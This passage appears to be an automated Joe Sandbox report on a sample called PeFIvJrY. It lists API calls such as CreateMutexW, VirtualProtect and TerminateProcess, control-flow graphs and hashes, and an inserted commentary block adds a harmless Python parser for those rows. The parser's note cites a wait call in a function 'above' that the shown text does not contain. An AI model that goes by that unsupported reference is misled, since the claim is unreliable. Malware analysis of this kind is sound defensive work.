                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Process$BaseChangeCloseEnumErrorFindLastModuleModulesNameNotificationObjectOpenSingleTerminateWait
                                • String ID:
                                • API String ID: 382258105-0
                                • Opcode ID: 4a8be9b21c4476a2e809628068972764bb3c2bd590dc1ddf37faf36968c3ee71
                                • Instruction ID: 7538a9f7956f09b8b7b6a0ff86358e446f85c9c892a013fe943ad94af204ec4e
                                • Opcode Fuzzy Hash: 4a8be9b21c4476a2e809628068972764bb3c2bd590dc1ddf37faf36968c3ee71
                                • Instruction Fuzzy Hash: D8B1E771D006288BDB25DF28DC897AEB7B5FF55300F1402A9E90DA7291E731AE84CF95
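Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python parser for the "APIs" rows of this listing, so the per-function call sites can be worked with as data instead of read by eye. The input is a constructed excerpt of rows copied from this section; the row grammar (bullet, optional "Part of subcall function" prefix, Name.MODULE, optional argument list, "ref:" address) is assumed from how the rows render here. Decoding the second WaitForSingleObject argument as dwMilliseconds follows the documented Win32 signature, which is how 0000EA60 in the first function above turns out to be a 60-second wait.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed input: a handful of "APIs" rows copied from the function listings
# in this report section (bullets, "ref:" addresses and the "Part of subcall"
# prefix are kept exactly as the report renders them).
SAMPLE_ROWS = """\
• K32GetModuleBaseNameW.KERNEL32(?,?,?,00000104,?,A05DD77D), ref: 003FAC2E
• TerminateProcess.KERNEL32(?,00000000,?,A05DD77D), ref: 003FAD77
• WaitForSingleObject.KERNEL32(?,0000EA60,?,A05DD77D), ref: 003FAE6B
• CreateMutexW.KERNEL32(00000000,00000000,?), ref: 003EF193
• GetLastError.KERNEL32 ref: 003EF19E
• RtlExitUserThread.NTDLL(00000000), ref: 0042DCDE
  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 00427270
"""

# One row (assumed grammar): optional "Part of subcall function <addr>:" prefix,
# then Name.MODULE, an optional "(arg,arg,...)" list, then ", ref: <addr>".
ROW_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]      # raw tokens; "?" means the plugin could not resolve the value
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # set when the row came from a "Part of subcall function" line


def parse_api_rows(text: str) -> List[ApiCall]:
    """Parse report rows into ApiCall records; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = tuple(a.strip() for a in raw_args.split(",") if a.strip()) if raw_args else ()
        sub = m.group("sub")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return calls


def hex_arg(call: ApiCall, index: int) -> Optional[int]:
    """Argument `index` as an int if the plugin resolved it to a hex literal, else None."""
    if index >= len(call.args):
        return None
    try:
        return int(call.args[index], 16)
    except ValueError:  # "?" or a symbolic token such as Function_0004DCC4
        return None


def wait_timeouts_ms(calls: List[ApiCall]) -> List[int]:
    """dwMilliseconds (second parameter) of each WaitForSingleObject whose value was resolved.

    0000EA60 in the listing is 60000 ms, a 60-second wait; FFFFFFFF would be INFINITE.
    """
    timeouts: List[int] = []
    for c in calls:
        if c.name == "WaitForSingleObject":
            ms = hex_arg(c, 1)
            if ms is not None:
                timeouts.append(ms)
    return timeouts


def calls_by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Group API names by the module the plugin attributed them to, in listing order."""
    grouped: Dict[str, List[str]] = {}
    for c in calls:
        grouped.setdefault(c.module, []).append(c.name)
    return grouped


if __name__ == "__main__":
    parsed = parse_api_rows(SAMPLE_ROWS)
    for call in parsed:
        print(f"{call.ref:08X} {call.module}!{call.name}{call.args}")
    print("WaitForSingleObject timeouts (ms):", wait_timeouts_ms(parsed))
    print("by module:", calls_by_module(parsed))
```

Rows whose arguments the plugin could not resolve keep the literal "?" token, so a check such as `hex_arg` returns None rather than guessing; only values the report actually printed are decoded.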

                                Control-flow Graph (basic block: address range, API and subroutine calls -> successor blocks)
                                • 978 40ad20-40ad85 -> 979, 980
                                • 979 40af5b-40af6a -> 983
                                • 980 40ad8b-40adb2 GetLastError -> 981, 982
                                • 981 40adb8-40adc4 -> 984
                                • 982 40af6c-40af6e call 40a000 -> 990
                                • 983 40af3b-40af58 call 425711
                                • 984 40adc7-40adcb -> 987, 988
                                • 987 40ade6-40ae0b call 424cbf -> 995, 996
                                • 988 40adcd -> 991
                                • 990 40af73 -> 995
                                • 991 40add0-40add4 -> 987, 993
                                • 993 40add6-40addc -> 991, 998
                                • 995 40af78-40af86 call 424cdb -> 984
                                • 996 40ae11-40ae62 call 3f9e40, call 400000 -> 1004, 1005
                                • 998 40adde-40ade3 SwitchToThread -> 987
                                • 1004 40ae64-40ae81 call 40a940 -> 1005
                                • 1005 40ae86-40aed0 call 40a7c0, call 3f9e70, call 424cbf -> 1014, 1015
                                • 1014 40aed2-40aedb -> 1016
                                • 1015 40aedd-40aee4 call 40a9c0 -> 1016
                                • 1016 40aee9-40aef0 -> 1018, 1019
                                • 1018 40aef2-40aefa call 424cdb -> 1019
                                • 1019 40aefd-40af19 SetLastError -> 983
                                APIs
                                • GetLastError.KERNEL32(A05DD77D,?,?,?,?,?,?,?,?,?,?,?,0043D095,000000FF), ref: 0040AD9A
                                • SwitchToThread.KERNEL32(?,?), ref: 0040ADDE
                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040AF10
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$SwitchThread
                                • String ID: <{!truncated!}>
                                • API String ID: 2971943850-4093793577
                                • Opcode ID: be1c26a6cc8bbb8c25eec4224fec6504b150c5136eb613e11177cd356ed708c0
                                • Instruction ID: 57bcff391d55d6cfd6613a97e49da99b40583f86f8c57f0a265c0364e934f299
                                • Opcode Fuzzy Hash: be1c26a6cc8bbb8c25eec4224fec6504b150c5136eb613e11177cd356ed708c0
                                • Instruction Fuzzy Hash: BF7159B0A00648DFCB05DFA9D881AEEFBF1FF48304F14816AE815AB391D735A951CB65

                                Control-flow Graph (basic block: address range, API and subroutine calls -> successor blocks)
                                • 1022 632a1a8-632a1b4 -> 1023, 1024
                                • 1023 632a1b6-632a221 -> 1024
                                • 1024 632a228-632a247 GetCurrentProcess -> 1025, 1026
                                • 1025 632a250-632a284 GetCurrentThread -> 1028, 1029
                                • 1026 632a249-632a24f -> 1025
                                • 1028 632a286-632a28c -> 1029
                                • 1029 632a28d-632a2c1 GetCurrentProcess -> 1031, 1032
                                • 1031 632a2c3-632a2c9 -> 1032
                                • 1032 632a2ca-632a2e5 call 632a388 -> 1036
                                • 1036 632a2eb-632a31a GetCurrentThreadId -> 1038, 1039
                                • 1038 632a323-632a385
                                • 1039 632a31c-632a322 -> 1038
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0632A236
                                • GetCurrentThread.KERNEL32 ref: 0632A273
                                • GetCurrentProcess.KERNEL32 ref: 0632A2B0
                                • GetCurrentThreadId.KERNEL32 ref: 0632A309
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: d68f8d1a3f38508345c93307713989d7f47f2b5bc7c9bec9ce7385f365e0abf9
                                • Instruction ID: e20ab0868f07abbd4480159902b5923e3784a0cbaaa1f42b0b3d6a2269ddd900
                                • Opcode Fuzzy Hash: d68f8d1a3f38508345c93307713989d7f47f2b5bc7c9bec9ce7385f365e0abf9
                                • Instruction Fuzzy Hash: FB5134B4D1070A8FDB54CFAAD948BDEBBF1EF88310F20845AE019A7360D7759944CB65

                                Control-flow Graph (basic block: address range, API and subroutine calls -> successor blocks)
                                • 1046 632a1b8-632a247 GetCurrentProcess -> 1051, 1052
                                • 1051 632a250-632a284 GetCurrentThread -> 1053, 1054
                                • 1052 632a249-632a24f -> 1051
                                • 1053 632a286-632a28c -> 1054
                                • 1054 632a28d-632a2c1 GetCurrentProcess -> 1056, 1057
                                • 1056 632a2c3-632a2c9 -> 1057
                                • 1057 632a2ca-632a2e5 call 632a388 -> 1060
                                • 1060 632a2eb-632a31a GetCurrentThreadId -> 1061, 1062
                                • 1061 632a323-632a385
                                • 1062 632a31c-632a322 -> 1061
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0632A236
                                • GetCurrentThread.KERNEL32 ref: 0632A273
                                • GetCurrentProcess.KERNEL32 ref: 0632A2B0
                                • GetCurrentThreadId.KERNEL32 ref: 0632A309
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 32d125d189d1421af52317729b194fcf9bb800ab0dfc5870e22c04c59ee9b223
                                • Instruction ID: 7804789083a82e6841e500290171ad0b1061b757f5080af8e4d4589d563be7c0
                                • Opcode Fuzzy Hash: 32d125d189d1421af52317729b194fcf9bb800ab0dfc5870e22c04c59ee9b223
                                • Instruction Fuzzy Hash: C75145B0D107098FDB54CFAAD948BDEBBF1EF88310F20845AE019A7360DB755944CB65

                                Control-flow Graph (basic block: address range, API and subroutine calls -> successor blocks)
                                • 1069 3ef180-3ef1af CreateMutexW, GetLastError -> 1070, 1071
                                • 1070 3ef1df-3ef1e0
                                • 1071 3ef1b1-3ef1c3 -> 1072, 1073
                                • 1072 3ef1d5-3ef1dc call 4259a5 -> 1070
                                • 1073 3ef1c5-3ef1d3 -> 1072, 1074
                                • 1074 3ef1e3-3ef229 call 4291af -> 1079, 1080
                                • 1079 3ef23d-3ef244 -> 1081, 1082
                                • 1080 3ef22b-3ef233 -> 1079
                                • 1081 3ef258-3ef27d -> 1083, 1084
                                • 1082 3ef246-3ef24e -> 1081
                                • 1083 3ef27f-3ef288 GlobalDeleteAtom -> 1084
                                • 1084 3ef28c-3ef291 -> 1087, 1088
                                • 1087 3ef29a-3ef29e -> 1089, 1090
                                • 1088 3ef293-3ef294 FreeLibrary -> 1087
                                • 1089 3ef2ab-3ef2bc
                                • 1090 3ef2a0-3ef2a8 call 4259a5 -> 1089
                                APIs
                                • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 003EF193
                                • GetLastError.KERNEL32 ref: 003EF19E
                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 003EF280
                                • FreeLibrary.KERNEL32(?,A05DD77D,?,00000000,0043B3A0,000000FF), ref: 003EF294
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AtomCreateDeleteErrorFreeGlobalLastLibraryMutex
                                • String ID:
                                • API String ID: 717197772-0
                                • Opcode ID: a662ffbe07fbf2a36b980932a9c029abec4f9f6c52fb964ee08d0e9732b6e075
                                • Instruction ID: 6d1270504a4803e3a9c21d03aeca1e13297ca10974a98818d49c63c3f4deb390
                                • Opcode Fuzzy Hash: a662ffbe07fbf2a36b980932a9c029abec4f9f6c52fb964ee08d0e9732b6e075
                                • Instruction Fuzzy Hash: 2F31E274200258DFEB11DF65EC04B5A7BE8FB08714F004639EA05C72A0EBB9DA50CFA9
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017,A05DD77D), ref: 00404213
                                • VirtualProtect.KERNEL32 ref: 0040433A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FeaturePresentProcessorProtectVirtual
                                • String ID: \\?\C:\Windows
                                • API String ID: 2760357182-641808500
                                • Opcode ID: e935bbaee986ac052a5520b8611440180f31466fe1e2d30fb21e1c737fa4cadb
                                • Instruction ID: 2a0ef8de441900a834d5c7e857ae70488f3231e1f9b483f3c8d6ce7d22943a1f
                                • Opcode Fuzzy Hash: e935bbaee986ac052a5520b8611440180f31466fe1e2d30fb21e1c737fa4cadb
                                • Instruction Fuzzy Hash: 5151F1B1905210DBD710DF24E94972A7BA4FB4430CF46827FD9056B3A1FBB959088BAF
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E20CE
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 3109751735-3421840758
                                • Opcode ID: cc039822be1256842e87f05f3d3b9e3ecdb72919299116b1c3cc4061fd6ebb45
                                • Instruction ID: c92646c22b474af1649a8c1ac2c9edee6bb447a1008b1dacf286c79f5a0c7cca
                                • Opcode Fuzzy Hash: cc039822be1256842e87f05f3d3b9e3ecdb72919299116b1c3cc4061fd6ebb45
                                • Instruction Fuzzy Hash: 0A01C831A0021CB7CB14AAA6FC46989776C9E00354BA04637FA14EB582FB78EA5586DD
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_0004DCC4,00000000,00000000,00000000), ref: 0042DE69
                                • GetLastError.KERNEL32(?,003EA221,00000000,00000000), ref: 0042DE75
                                • __dosmaperr.LIBCMT ref: 0042DE7C
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateErrorLastThread__dosmaperr
                                • String ID:
                                • API String ID: 2744730728-0
                                • Opcode ID: fdca472e9d85883ef0f3ee81d57c698baa58f593e086b5814675c7f797b6a49f
                                • Instruction ID: e8990f9fdf7317ac846f9c775568fd6451f76f5af8126b7cc85916c02f9cc8cb
                                • Opcode Fuzzy Hash: fdca472e9d85883ef0f3ee81d57c698baa58f593e086b5814675c7f797b6a49f
                                • Instruction Fuzzy Hash: CE01B172A11229AFDF159FA1EC06AEF3B64EF50354F50402AF8019A290DB78DE10DB98
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 003F5349
                                Strings
                                • failed to initialize COM, xrefs: 003F5387
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID: failed to initialize COM
                                • API String ID: 2882836952-2564502714
                                • Opcode ID: be014e44686837f00f207084543a6a5a42e9c440994d500084b1d65ca1e78e7c
                                • Instruction ID: a966bb1af97e7207b697c4f09622a3d16934273a70ee986f2a7afe9d0b72199c
                                • Opcode Fuzzy Hash: be014e44686837f00f207084543a6a5a42e9c440994d500084b1d65ca1e78e7c
                                • Instruction Fuzzy Hash: 8C210275900208AFCB01EF98C945F69BBB8FF08710F24416AFA10C7291EBB5A814CBA1
                                APIs
                                • GetFinalPathNameByHandleW.KERNEL32(00000000,?,?,00000000), ref: 00406527
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040656A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorFinalHandleLastNamePath
                                • String ID:
                                • API String ID: 914413544-0
                                • Opcode ID: 89c806a1c2dbc7a5adafd437ff59790331d6d3d57cb1cd15554a0c31cf046b30
                                • Instruction ID: 2ce03a0ceeaf2440e8e81bd5b7624d76750b5410b021d7ad652d03edc10708fe
                                • Opcode Fuzzy Hash: 89c806a1c2dbc7a5adafd437ff59790331d6d3d57cb1cd15554a0c31cf046b30
                                • Instruction Fuzzy Hash: 04415B74A002099FCB04DF98D994BAEBBF5BF49304F15806EE906B7390D775A901CFA5
                                APIs
                                • GetLastError.KERNEL32(00458FD0,0000000C), ref: 0042DCD7
                                • RtlExitUserThread.NTDLL(00000000), ref: 0042DCDE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorExitLastThreadUser
                                • String ID:
                                • API String ID: 1750398979-0
                                • Opcode ID: 0bc6fd9b3738cf55f0eb914e208f0773397058de1e429994022a5bca303140f2
                                • Instruction ID: fa36a96a07579721d792e5b217d53c3b9d6bc249593a5ffb51bc62106c2e455a
                                • Opcode Fuzzy Hash: 0bc6fd9b3738cf55f0eb914e208f0773397058de1e429994022a5bca303140f2
                                • Instruction Fuzzy Hash: E3F0C275A00215AFDB04BFB1E80AA2E3B75FF49701F54045FF5019B2A2DB785901CBA9
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 06300FAE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 80ced3dd83278dbfb61ba7da6a8e957947b9270355f7ee25d246f869f1983676
                                • Instruction ID: 4f8cba9445834f9a73b5a64437d36bd4cb4c017764d78cc91aeee07e745a0dd1
                                • Opcode Fuzzy Hash: 80ced3dd83278dbfb61ba7da6a8e957947b9270355f7ee25d246f869f1983676
                                • Instruction Fuzzy Hash: 2B815770A00B058FE7A8DF29D45479ABBF5FF88204F00892DD49AD7B90DB74E849CB91
                                APIs
                                • __Mtx_init_in_situ.LIBCPMT ref: 003EA18A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Mtx_init_in_situ
                                • String ID:
                                • API String ID: 3366076730-0
                                • Opcode ID: b3ac933dd2293bfc3ce1a7abce065ac5ae763f79fbe0ce7589e017f8da27cc02
                                • Instruction ID: 152de22e5cd3e4b7c6118e26adff72de73274269a0c6a20fd26caeada3caadc2
                                • Opcode Fuzzy Hash: b3ac933dd2293bfc3ce1a7abce065ac5ae763f79fbe0ce7589e017f8da27cc02
                                • Instruction Fuzzy Hash: 41616AB090074A9FE714DF55C84579AFBF0FF45308F14825EE5086B282E7BAA588CBD5
                                APIs
                                  • Part of subcall function 00424CBF: RtlAcquireSRWLockExclusive.NTDLL(?), ref: 00424CC5
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040A05C
                                  • Part of subcall function 00424CF7: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0040A088), ref: 00424D01
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AcquireExclusiveHandleInfoLockModuleNativeSystem
                                • String ID:
                                • API String ID: 2396907284-0
                                • Opcode ID: cd8a77f870ad0100b3d33b9242dad80969f2572b997192e0434f46d0d7e7c2d4
                                • Instruction ID: 4eb1054d346a52ca6f5515c947e77427b76602b0bf76102f6702049501ad661b
                                • Opcode Fuzzy Hash: cd8a77f870ad0100b3d33b9242dad80969f2572b997192e0434f46d0d7e7c2d4
                                • Instruction Fuzzy Hash: 4941A1B1E002198FCF14DF69D885AEEB7B4EF48314F14053AE915BB381EB386914CB96
                                APIs
